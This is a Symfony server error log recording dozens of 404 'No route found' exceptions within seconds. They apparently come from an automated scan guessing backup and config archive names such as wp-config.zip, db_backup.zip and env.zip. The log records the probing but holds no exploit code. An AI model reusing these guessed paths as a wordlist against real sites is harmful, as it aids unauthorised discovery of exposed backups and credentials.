[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Archive.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Archive.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /postgresql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /postgresql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /xml.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /xml.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /oracle.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /oracle.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /audio.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /audio.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rpc.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rpc.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-20240527.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-20240527.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /snapshot.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /snapshot.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /web.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /web.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webapps.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webapps.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqlite.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqlite.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_monthly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_monthly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /soap.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /soap.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /copy.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /copy.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /uploads.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /uploads.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /subdomain.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /subdomain.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mssql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mssql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqlserver.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqlserver.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_2.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_2.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webservice.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webservice.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /microservice.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /microservice.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /root.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /root.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /websites.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /websites.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dotenv.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dotenv.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /htdocs.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /htdocs.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-admin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-admin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cassandra.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cassandra.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mysql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mysql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /resources.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /resources.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /db_backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /db_backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /tmp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /tmp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /db.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /db.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /graphql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /graphql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_4.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_4.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_daily.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_daily.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_3.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_3.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
